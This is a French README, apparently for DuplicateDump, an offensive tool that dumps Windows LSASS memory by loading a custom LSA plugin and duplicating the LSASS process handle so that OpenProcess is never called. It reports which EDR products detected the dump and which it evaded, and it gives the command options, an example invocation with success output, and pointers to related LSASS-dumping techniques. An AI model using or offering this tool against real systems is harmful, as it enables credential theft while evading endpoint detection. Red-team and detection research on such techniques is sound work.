
Extraction de LSASS avec un handle dupliqué depuis un plugin LSA personnalisé
DuplicateDump est un fork de MirrorDump avec les modifications suivantes :
DuplicateDump ajoute un plugin LSA personnalisé qui duplique le handle de processus LSASS depuis le processus LSASS vers DuplicateDump. Ainsi, DuplicateDump dispose d'un handle de processus prêt à l'emploi pour LSASS sans invoquer OpenProcess.
En chargeant DuplicateDump en mémoire, il a été capable de dumper la mémoire de LSASS sans détection sur :
Détecté par Cortex XDR, Crowdstrike. Échec du dump de lsass sans détection sur SentinelOne.
Compilez le plugin LSA (exportez la fonction SpLsaModeInitialize ou dllMain) et fournissez le chemin complet de la DLL à DuplicateDump
.\DuplicateDump.exe --help
-f, --filename=VALUE Le chemin où écrire le fichier de dump
-p, --plugin=VALUE Chemin complet du fichier vers le plugin LSA
-c, --compress GZip et supprime le fichier de dump sur le disque
-d, --DebugPriv Obtenir SeDebugPrivilege
-h, --help Afficher cette aide
Exemple
.\DuplicateDump.exe -f test -c -p C:\LSAPlugin.dll
[+] Chargement du package de sécurité LSA
[+] Named pipe connecté et réponse avec le PID actuel 6492
[+] Handle de processus LSASS dupliqué trouvé 0x3d0
[+] Fichier de dump compressé enregistré sous test.gz
DuplicateDump utilise DInvoke pour appeler l'API AddSecurityPackage afin de charger un plugin LSA. Vous pouvez utiliser un appel RPC sans avoir à invoquer directement cet appel API. Consultez les détails dans le billet de blog de XPN
Récemment, splinter_code a découvert que SecLogon pouvait être utilisé pour dumper LSASS. Je vous recommande vivement d'étudier son billet de blog.